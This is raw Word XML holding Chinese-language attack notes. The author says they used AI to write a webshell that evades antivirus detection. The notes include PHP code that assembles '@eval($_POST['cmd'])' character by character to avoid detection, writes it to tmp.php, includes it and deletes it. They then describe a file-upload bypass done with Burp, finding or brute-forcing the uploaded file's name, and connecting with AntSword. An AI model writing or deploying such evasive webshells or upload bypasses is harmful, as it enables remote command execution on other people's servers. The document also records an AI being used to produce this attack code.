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7D5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通过ai先写一个websehll免杀</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4F3C0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通过ai成功写了一个绕过webshell免杀的php代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E71958"/>
    <w:p w14:paraId="1A9B5E43">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5257800" cy="298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7B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这个连不上，显示为空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E034B66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="121D52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下面这个也显示为空，蚁剑问题可能，据说哥斯拉可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A73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 w14:paraId="4B4078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error_reporting(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B28E60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45A512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$filename_parts = array('t', 'm', 'p', '.', 'p', 'h', 'p');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C37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$filename = implode('', $filename_parts); // tmp.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9B5E19">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3A1E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$content_parts = array('&lt;', '?', 'p', 'h', 'p', ' ', '@', 'e', 'v', 'a', 'l', '(', '$', '_', 'P', 'O', 'S', 'T', '[', '\'', 'c', 'm', 'd', '\'', ']', ')', ';', '?', '&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610AF3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$content = implode('', $content_parts); // '&lt;?php @eval($_POST['cmd']);?&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3DFE8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0330B5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file_put_contents($filename, $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC85690">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665213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include($filename);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D2FA5C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7585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@unlink($filename);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2677E9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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8146CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7007DD33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69181748">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="196AA62D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66834577">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C3D2E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二：</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="27196D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用burp抓包，上传一个正常图片，后缀添加：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A10EC07">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5229225" cy="128587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72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通过上帝视角找到文件路径，或者写脚本爆破出来文件名：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DBFB8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746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3EA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通过蚁剑连接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E7DE77">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260975" cy="33991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69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添加数据后可以直接打开：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FAAB26">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E21FC9">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="305879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F838"/>
    <w:p w14:paraId="2102715F">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="14135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7551A"/>
    <w:rsid w:val="1B2A71BF"/>
    <w:rsid w:val="377334B5"/>
    <w:rsid w:val="500C6D89"/>
    <w:rsid w:val="5E5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2025-09-07T09:17:19Z</dcterms:created>
  <dc:creator>www</dc:creator>
  <cp:lastModifiedBy>k秸闹感啃孔</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-07T14:51:03Z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eyJoZGlkIjoiNDM0NmE2NzFiNDA2NTk4YzBlNThhYzRhNWJkZmY0M2UiLCJ1c2VySWQiOiIxNzIzNDA0ODAxIn0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>979F27CB058C4E699CAAC2AA5E17C33C_12</vt:lpwstr>
  </property>
</Properties>
</file>